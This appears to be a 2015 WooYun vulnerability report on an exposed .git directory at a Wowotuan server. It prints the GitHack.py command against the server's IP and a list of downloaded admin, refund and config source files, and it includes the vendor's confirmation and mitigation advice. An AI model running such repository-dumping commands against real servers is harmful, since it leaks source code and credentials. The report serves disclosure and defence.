当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123363

漏洞标题:窝窝团某服务敏感信息泄漏(可读取程序源码)

相关厂商:窝窝团

漏洞作者: 啊L川

提交时间:2015-06-29 13:39

修复时间:2015-08-13 17:30

公开时间:2015-08-13 17:30

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

RT

详细说明:

Git服务敏感信息泄漏导致源码下载

http://116.213.178.99/.git/config


python GitHack.py http://116.213.178.99/.git/
[+] Download and parse index file ...
[OK] adminjeehe/bd_auditing_refundment.php
[OK] adminjeehe/includes/RefundDeal.class.php
[OK] adminjeehe/includes/RefundGoods.class.php
[OK] adminjeehe/includes/RefundApply.class.php
[OK] adminjeehe/includes/RefundTransfer.class.php
[OK] adminjeehe/includes/Refundment.class.php
[OK] adminjeehe/order.php
[OK] adminjeehe/refundment.php
[OK] adminjeehe/refundment_api.php
[OK] adminjeehe/templates/order_trade_list.htm
[OK] adminjeehe/third_refund_list.php
[OK] data/config.php
[OK] data/development.php
[OK] data/hotfix.php
[OK] data/liantiao.php
[OK] data/special.php
[OK] data/production.php
[OK] data/release.php


来看下 config.php

QQ20150628-12@2x.png


QQ20150628-13@2x.png

漏洞证明:

QQ20150628-15@2x.png


QQ20150628-15@2x.png

修复方案:

版权声明:转载请注明来源 啊L川@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-06-29 17:28

厂商回复:

.svn/.git隐藏目录的问题容易一犯再犯,而且由不同技术团队事隔多年之后重蹈覆辙,第一得靠自动化上线过滤这种隐藏目录,第二还是得靠Nginx配置统一屏蔽Web访问。多谢这位童鞋帮我们找到非生产环境里的这个漏洞!

最新状态:

暂无